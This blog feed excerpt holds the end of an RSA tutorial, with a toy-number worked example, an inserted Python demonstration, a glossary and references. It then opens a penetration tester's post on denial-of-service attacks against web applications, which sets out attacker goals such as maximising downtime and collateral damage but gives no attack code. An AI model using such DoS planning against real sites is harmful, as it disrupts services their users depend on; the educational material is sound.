have been destroyed), then the value of φ is very hard to determine. The secret
value of d together with the value n represents the private key. </span></span><span style="font-family: Times, 'Times New Roman', serif;">The public
key consists of the modulus n and the public (or encryption) exponent e. The
private key consists of the modulus n and the private (or decryption) exponent
d, which must be kept secret.</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span style="font-size: large;">
RSA
Encryption<o:p></o:p></span></span></h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;">RSA
Cryptographic User A transmits his public key </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><b>(<i>n</i>,<i>e</i>)</b></span><span style="font-family: Times, 'Times New Roman', serif;"> to RSA
Cryptographic User B and keeps his private key </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><b>(<i>n</i>,<i>d</i>)</b></span><span style="font-family: Times, 'Times New Roman', serif;"> secret. RSA Cryptographic
User B then wishes to send a secret message </span><b style="font-family: Times, 'Times New Roman', serif;">m</b><span style="font-family: Times, 'Times New Roman', serif;"> to RSA Cryptographic User A.
He first turns </span><b style="font-family: Times, 'Times New Roman', serif;">m </b><span style="font-family: Times, 'Times New Roman', serif;">into an integer </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;">0 < <i>m</i>
< <i>n</i></span><span style="font-family: Times, 'Times New Roman', serif;"> by using an agreed-upon reversible procedure (only known
to Users A and B). He then computes the cipher text </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><i>c</i></span><span style="font-family: Times, 'Times New Roman', serif;">
corresponding to: [9]</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--EndFragment--></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eiEOEQahD-YiVPBz34zouZJh2uR9FzSvwH4mJqJC_hyphenhyphenIvO3FFBq4tHiaCw2Zns_33u3N83jcyMkeiG4ElAbcqzVoXwxRlcwiGlk7Eb9xPQ546JoW0W57ZAq_-YoRR7FX0Uf0EA76_dY/s1600/c5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: Times, Times New Roman, serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eiEOEQahD-YiVPBz34zouZJh2uR9FzSvwH4mJqJC_hyphenhyphenIvO3FFBq4tHiaCw2Zns_33u3N83jcyMkeiG4ElAbcqzVoXwxRlcwiGlk7Eb9xPQ546JoW0W57ZAq_-YoRR7FX0Uf0EA76_dY/s1600/c5.png" /></span></a></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Note: </b>The encryption is now
complete. User A is the only person who can decrypt the secret integer <b><i>m. </i></b> <o:p></o:p></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span><br />
<div class="MsoNormal">
<br /></div>
<h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span style="font-size: large;">RSA Decryption</span></span></h1>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">RSA Cryptographic User A can recover <i>m</i> from <i>c</i> by using his private key exponent <i>d</i> with the following computation:</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0cj9aBhkKj4WiJoXk8oVq-ftrTNBHX4Oonw4J-CFLlKhJb7bejaqBGDIQVP9k8axYWro5Q-4SgTwtdsfNZfxXJVAlMwHISrFHfJ_a0rdKbw8cqbJAsOb8ubxg1xlSNP4XWdTGGzOTun0/s1600/c6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0cj9aBhkKj4WiJoXk8oVq-ftrTNBHX4Oonw4J-CFLlKhJb7bejaqBGDIQVP9k8axYWro5Q-4SgTwtdsfNZfxXJVAlMwHISrFHfJ_a0rdKbw8cqbJAsOb8ubxg1xlSNP4XWdTGGzOTun0/s1600/c6.png" /></a></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB"><br /></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--EndFragment--></span></div>
<div class="MsoNormal">
<b style="font-family: Times, 'Times New Roman', serif;"><br /></b><b style="font-family: Times, 'Times New Roman', serif;">Note: </b><span style="font-family: Times, 'Times New Roman', serif;">Given the integer </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><i>m</i></span><span style="font-family: Times, 'Times New Roman', serif;">, he can recover the original message </span><b style="font-family: Times, 'Times New Roman', serif;">m</b><span style="font-family: Times, 'Times New Roman', serif;"> by applying
the agreed-upon reversible procedure in reverse.</span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span><br />
<h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span style="font-size: large;">RSA Encryption/Decryption Simple Example</span></span></h1>
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;">For the purposes of
this paper we are going to use a very simple number example. Based on Example 4
we have to:</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">1.<span style="font-size: 7pt;">
</span><!--[endif]-->Choose <b><i>p = 47</i></b>
and <b><i>q
= 73</i></b>. Based on mathematical relationship </span><span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">(b), n = pq = 47 * 73 => <b><span style="color: #ff6600;">n = 3431</span></b>; also from relationship (c) we
conclude that:</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">(c) => <i> </i><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>pq</i>) = (<i>p</i> − 1)(<i>q</i> − 1)
or </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>n</i>) = </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>pq</i>) = </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>3431</i>) = (73-1)(47-1) = 72*46 = 3312
=> </span><b><i><span lang="EL" style="color: #ff6600;">φ</span></i></b><b><span lang="EN-GB" style="color: #ff6600; mso-ansi-language: EN-GB;"> = 3312</span></b></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB" style="color: #ff6600; mso-ansi-language: EN-GB;"><br /></span></b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">2.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Now
that we have <i>n</i> and </span><i><span lang="EL">φ</span></i><span lang="EN-GB">, we should discard <i>p</i> and <i>q,</i> and
destroy any trace of their existence.</span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">3.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Next,
we randomly select a number <i>e</i></span><i> such that </i><span class="texhtml"><i><span lang="EN-GB">e</span></i></span><span class="texhtml"><span lang="EN-GB"> > 1</span></span><span lang="EN-GB">, <i>e</i> < 3312, and <i>e</i> is coprime [16] to <b>3312 </b>(which
is<i> </i></span><i><span lang="EL">φ</span></i><b><span lang="EN-GB">)</span></b><span lang="EN-GB">. </span></span><span style="font-family: Times, 'Times New Roman', serif;">We choose </span><b style="font-family: Times, 'Times New Roman', serif;"><i><span style="color: #ff6600;">e = 425</span></i></b></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">4.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Then
the modular inverse of <i>e</i> modulo <i>φ</i> (obtained with the extended Euclidean algorithm) is calculated to be: <b><i><span style="color: #ff6600;">d = 1769</span></i></b></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">5.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">We
now keep <i>d</i> private and make <i>e</i> and <i>n</i> public.</span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">6.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Assume
that we have plaintext data represented by the following simple number:<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="text-indent: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><i><span style="color: #ff6600; mso-ansi-language: EN-US;">P</span><span lang="EL" style="color: #ff6600;">laintext = 707</span></i></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">7.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">The
encrypted data is computed by <i>c</i> = <i>m<sup>e</sup></i> (mod <i>n</i>) as
follows: <o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="text-indent: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><i><span style="color: #ff6600;">Ciphertext = 707^425 (mod 3431) = 2142</span></i></b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">8.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">The
cipher text value cannot be easily reverted back to the original plaintext
without knowing <i>d</i> (or, equivalently, knowing the values of <i>p</i> and <i>q</i>).
With larger bit sizes, this task grows exponentially in difficulty. If,
however, you are privy to the secret information that <i>d</i> = 1769, then the
plaintext is easily retrieved using <i>m</i>
= <i>c <sup>d</sup></i>(mod <i>n</i>) as follows: <o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="text-indent: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><i><span lang="EN-GB" style="color: #ff6600; mso-ansi-language: EN-GB;">Plaintext = 2142^1769 (mod 3431) = 707</span></i></b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<br />
<b><span style="font-size: large;">Why RSA can’t be broken</span></b><br />
<br />
The security of the RSA cryptosystem is based on two mathematical problems:<br />
<span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">
</span><br />
<ol class="ol1"><span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">
<li class="li1">The problem of factoring large numbers</li>
<li class="li1">The RSA problem.</li>
</span></ol>
<span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">In number
theory, <b>integer factorization</b> or <b>prime factorization</b> is the
breaking down of a composite number into smaller non-trivial divisors, which
when multiplied together equal the original integer. [17] </span><span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">In
cryptography, the <b>RSA problem</b> summarizes the task of performing an RSA
private-key operation given only the public key. [18] </span><span style="font-family: Times, 'Times New Roman', serif;">Full
decryption of an RSA ciphertext is thought to be infeasible on the assumption
that both of these problems are hard, that is, that no efficient algorithm is
known for solving them.</span><br />
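The key generation, encryption and decryption steps above, carried through in code with the article's own numbers, followed by a trial-division factoring of n that shows why the factoring problem just described is the whole story. This is an added example, not code from the article; it assumes p = 47 and q = 73, the prime factors of the article's n = 3431.<br />

```python
# Added example (not the article's own code): textbook RSA with the article's
# toy numbers n = 3431, e = 425, d = 1769, m = 707, c = 2142.
# Assumption: p = 47 and q = 73 are the prime factors of n = 3431.
from __future__ import annotations

from math import gcd, isqrt


def egcd(a: int, b: int) -> tuple[int, int, int]:
    """Extended Euclidean algorithm: (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def modinv(e: int, phi: int) -> int:
    """Multiplicative inverse of e modulo phi: the d with e*d == 1 (mod phi)."""
    g, x, _ = egcd(e, phi)
    if g != 1:
        raise ValueError("e and phi(n) are not coprime; choose a different e")
    return x % phi


def keypair(p: int, q: int, e: int) -> tuple[tuple[int, int], int]:
    """Steps 1-5 of the article: public key (e, n) and private exponent d."""
    n = p * q
    phi = (p - 1) * (q - 1)          # Euler's totient of n for distinct primes p, q
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = modinv(e, phi)               # step 4: d = 1769 for the article's numbers
    return (e, n), d


def encrypt(m: int, e: int, n: int) -> int:
    """Step 7: c = m^e (mod n); pow() reduces at every step, so no huge intermediates."""
    return pow(m, e, n)


def decrypt(c: int, d: int, n: int) -> int:
    """Step 8: m = c^d (mod n), possible only for whoever holds d."""
    return pow(c, d, n)


def factor_small(n: int) -> tuple[int, int]:
    """Trial division: instant for a toy modulus, hopeless for a real 2048-bit one.

    This is the 'problem of factoring large numbers': anyone who solves it for n
    knows phi(n), hence d, and the key is broken. Key size is the only defence.
    """
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError(f"{n} has no non-trivial factor")


def recover_private_exponent(e: int, n: int) -> int:
    """With n factored, d follows from one modular-inverse computation."""
    p, q = factor_small(n)
    return modinv(e, (p - 1) * (q - 1))


if __name__ == "__main__":
    (e, n), d = keypair(47, 73, 425)
    print(f"n={n} e={e} d={d}")                 # n=3431 e=425 d=1769
    c = encrypt(707, e, n)
    print(f"ciphertext={c}")                     # 2142
    print(f"plaintext={decrypt(c, d, n)}")       # 707
    print(f"d from factoring n: {recover_private_exponent(e, n)}")  # 1769
```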
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<b><span style="font-size: large;">Appendix</span></b> <br />
<br />
<b>C</b><br />
<b style="font-family: Times, 'Times New Roman', serif;"><span lang="EN-GB"><br /></span></b>
<b style="font-family: Times, 'Times New Roman', serif;"><span lang="EN-GB">Cryptography:</span></b><span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;"> Is the process of converting ordinary
information (plaintext) into unintelligible gibberish.</span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB">Cipher:</span></b><span lang="EN-GB"> Is the unintelligible gibberish produced by encryption</span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB">Coprime:</span></b><span lang="EN-GB"> In mathematics, two integers <i>a</i> and <i>b</i>
are said to be <b>coprime</b> or <b>relatively prime</b> if they have no common
positive factor other than 1 or, equivalently, if their greatest common divisor
is 1. [16]</span></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><br /></b>
<b>D</b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB">Decryption:</span></b><span lang="EN-GB"> Is the reverse process of encryption</span></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>M</b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<div class="MsoNormal">
<b><span lang="EN-GB">Multiplicative
inverse</span></b><span lang="EN-GB">: In
mathematics, a <b>multiplicative inverse</b> or <b>reciprocal</b> for a number <i>x</i>,
denoted by <sup>1</sup>⁄<i><sub>x</sub></i> or <i>x</i> <sup>−1</sup>, is a
number which when multiplied by <i>x</i> yields the multiplicative identity, 1.
[15]</span><br />
<b><br /></b>
<b>P</b></div>
</span><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span lang="EN-GB">Plaintext: </span></b><span lang="EN-GB">Is ordinary readable information <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span lang="EN-GB">Problem of factoring large numbers: </span></b><span lang="EN-GB">In number theory, <b>integer
factorization</b> or <b>prime factorization</b> is the breaking down of a
composite number into smaller non-trivial divisors, which when multiplied
together equal the original integer. [17]<b><o:p></o:p></b></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span lang="EN-GB">Prime numbers: </span></b><span lang="EN-GB">In mathematics, a <b>prime number</b> (or a <b>prime</b>)
is a natural number that has exactly two <i>distinct</i> natural number
divisors: 1 and itself. [13]<b><o:p></o:p></b></span></div>
<h3>
<span style="font-size: large;"><br /></span></h3>
<h3>
<span style="font-size: large;">References</span></h3>
<div class="MsoNormal">
<b><span lang="EN-GB">[1]:</span></b><span lang="EN-GB"> <a href="http://www.bb.ustc.edu.cn/ocw/NR/rdonlyres/Electrical-Engineering-and-Computer-Science/6-875Spring-2005/0F52083E-BDFB-45A5-B804-3C186AFC80B3/0/chp_lock_binary.jpg">http://www.bb.ustc.edu.cn/ocw/NR/rdonlyres/Electrical-Engineering-and-Computer-Science/6-875Spring-2005/0F52083E-BDFB-45A5-B804-3C186AFC80B3/0/chp_lock_binary.jpg</a></span><b><span lang="EN-GB"> <o:p></o:p></span></b></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[2]: </span></b>Liddell and
Scott's Greek-English Lexicon. Oxford University Press. (1984)</div>
<div class="MsoNormal">
<b><span lang="EN-GB">[3]: </span></b><a href="http://www.switch.ch/export/sites/default/uni/projects/grid/download_repository/crypt%20o1.png">http://www.switch.ch/export/sites/default/uni/projects/grid/download_repository/crypt
o1.png</a></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[4]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Cryptography#cite_note-0">http://en.wikipedia.org/wiki/Cryptography#cite_note-0</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[5]: </span></b><span lang="EN-GB"> </span><a href="http://en.wikipedia.org/wiki/Symmetric-key_algorithm">http://en.wikipedia.org/wiki/Symmetric-key_algorithm</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[6]: </span></b><span lang="EN-GB"> </span><a href="http://en.wikipedia.org/wiki/Public-key_cryptography">http://en.wikipedia.org/wiki/Public-key_cryptography</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[7]: </span></b><span lang="EN-GB"> </span><a href="http://www.codeproject.com/KB/cs/SecuringData.aspx">http://www.codeproject.com/KB/cs/SecuringData.aspx</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[8]: </span></b><span lang="EN-GB"> </span><a href="http://en.wikipedia.org/wiki/RSA">http://en.wikipedia.org/wiki/RSA</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[9]: </span></b><span lang="EN-GB"> </span><a href="http://www.rsa.com/press_release.aspx?id=261">http://www.rsa.com/press_release.aspx?id=261</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[10]: </span></b><span lang="EN-GB"> <a href="http://www.rsa.com/node.aspx?id=1012">http://www.rsa.com/node.aspx?id=1012</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[11]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Euler%27s_totient_function">http://en.wikipedia.org/wiki/Euler%27s_totient_function</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[12]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm">http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[13]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Prime_number">http://en.wikipedia.org/wiki/Prime_number</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[14]: </span></b><span lang="EN-GB"><a href="http://www.informit.com/articles/article.aspx?p=102212&seqNum=4">http://www.informit.com/articles/article.aspx?p=102212&seqNum=4</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[15]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Multiplicative_inverse">http://en.wikipedia.org/wiki/Multiplicative_inverse</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[16]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Coprime">http://en.wikipedia.org/wiki/Coprime</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[17]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Integer_factorization">http://en.wikipedia.org/wiki/Integer_factorization</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[18]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/RSA_problem">http://en.wikipedia.org/wiki/RSA_problem</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[19]: </span></b><span lang="EN-GB"> <a href="http://www.cl.cam.ac.uk/~rnc1/brute.html">http://www.cl.cam.ac.uk/~rnc1/brute.html</a></span></div>
<!--EndFragment--></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB"><br /></span></div>
<!--EndFragment--></div>
<!--EndFragment--><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-84763174339035799952012-10-21T13:18:00.002-07:002012-10-30T14:51:16.732-07:00Bloody Death DoS-ing <b>Introduction</b><br />
<br />
In this article I am going to explain at a high level how to perform an amplified Denial of Service (DoS) attack on a Web Application, but you should be aware that these are real world scenarios that I have implemented during customer penetration tests. A successful DoS attack on a Web Application should happen at three different layers: the Web Application, the Web Application platform and the Web Server itself. It is common knowledge of course that you don't have to attack all three layers to successfully compromise the availability of a Web Server, but optimizing a DoS attack should be desirable from the perspective of an attacker. By using the word optimize I mean the following: <br />
<ol>
<li>Reduce to a minimum the number of machines generating malicious traffic.</li>
<li>Increase the amount of Web Server downtime.</li>
<li>Increase the amount of remediation time (e.g. recovery time).</li>
<li>Increase collateral damage (e.g. break the database).</li>
</ol>
But first I should explain what a DoS attack means. In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the efforts of one or more people to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.<br />
<br />
<b>Why talk about DoS/DDoS attacks</b><br />
<br />
These attacks
have become much more widespread and common in recent years and it is
not just the major corporations that are being targeted. Many are now
being focused on small and medium businesses as it is here that they
stand the most chance of launching a successful attack as well as
bringing the most havoc and chaos. The truth is that there is probably a
vast majority of websites that do not currently have some type of DDoS
attack protection and they will only suffer as a result.<br />
<br />
Network-layer
DDoS attacks are a popular tactic among hacktivists because they are
generally low-tech and easy to carry out. The attacks typically employ a
barrage of requests directed at a web server at a high frequency which
can cause disruptions, rendering the targeted website inaccessible. Analyzing traffic can be a
laborious undertaking, and reducing the volume of data to sift through
with a first line of defense can prove advantageous in maintaining a
robust network security stance. <br />
<br />
Financial firms were in
the crosshairs of cyber-attackers during the first three months of
2012, while a threefold increase in DDoS attacks was recorded. DDoS
mitigation biz Prolexic reports that <u>the growth in the number of
attacks against its clients in banking and insurance was accompanied by a
3,000 per cent increase in malicious packet traffic (up from 14 billion
packets of malicious traffic in Q4 2011 to 1.1 trillion in Q1 2012).</u><b> </b><br />
<br />
<b>Methods of performing a DoS or DDoS attack</b><br />
<br />
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.<br />
<br />
A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:<br />
<ol>
<li>Consumption of computational resources, such as bandwidth, disk space, or processor time.</li>
<li>Disruption of configuration information, such as routing information.</li>
<li>Disruption of state information, such as unsolicited resetting of TCP sessions.</li>
<li>Disruption of physical network components.</li>
<li>Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.</li>
</ol>
A DoS attack may include execution of malware intended to:<br />
<ol>
<li>Max out the processor's usage, preventing any work from occurring.</li>
<li>Trigger errors in the microcode of the machine.</li>
<li>Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.</li>
<li>Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. to use up all available facilities so no real work can be accomplished.</li>
<li>Crash the operating system itself.<b> </b> </li>
</ol>
<b>Note: </b>The definition of the DoS and DDoS attack was taken directly from Wikipedia (the link can be located at the bottom of the article). Wikipedia has a very good definition of what a DoS and DDoS attack is; what is missing is how these conditions (1 through 5) can arise in 2012 (which I think is out of scope of the wiki article anyway), meaning that the article is outdated and does not cover all conditions, because it reduces the attack surface to the machines surrounding the victim machine, the operating system (OS) of the victim machine and the hardware of the victim machine. <br />
<b><br /></b>
<b>Defining a valid DoS and DDoS attack surface </b><br />
<b><br /></b>
When I am referring to the attack surface of a DoS or DDoS attack I mean the components someone should be attacking in a Web Application. The components are: <br />
<ol>
<li>The Web Application.</li>
<li>The Web Application Platform.</li>
<li>The Web Server. </li>
</ol>
<b>Note:</b> Each component has its own peculiarities and has to be treated differently in order to have the best possible outcome.<br />
<br />
